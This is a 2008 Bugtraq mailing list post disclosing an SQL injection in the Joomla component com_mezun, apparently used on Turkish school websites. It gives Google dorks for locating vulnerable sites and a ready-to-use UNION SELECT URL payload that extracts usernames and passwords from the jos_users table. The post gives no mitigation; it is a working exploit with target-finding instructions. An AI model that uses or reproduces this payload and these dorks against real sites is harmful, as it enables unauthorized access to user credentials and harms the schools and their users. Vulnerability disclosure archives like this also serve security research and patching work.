Bugtraq mailing list archives

joomll(k12.tr)(com_mezun)SQL Injection


From: hackturkiye.hackturkiye () gmail com
Date: 12 Feb 2008 08:10:59 -0000

#########################################################################
# 
#  okul siteleri(k12.tr)(com_mezun)SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye () gmail com
#
#########################################################################
# 
#  DORK 1 : allinurl: com_mezun "hidemainmenu"
# 
#  DORK 2 : allinurl: com_mezun
#
#########################################################################


EXPLOIT : 

index.php?option=com_mezun&task=edit&hidemainmenu=S@BUN&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*
  

#########################################################################
# S@BUN         i AM NOT HACKER        S@BUN 
#########################################################################


Current thread: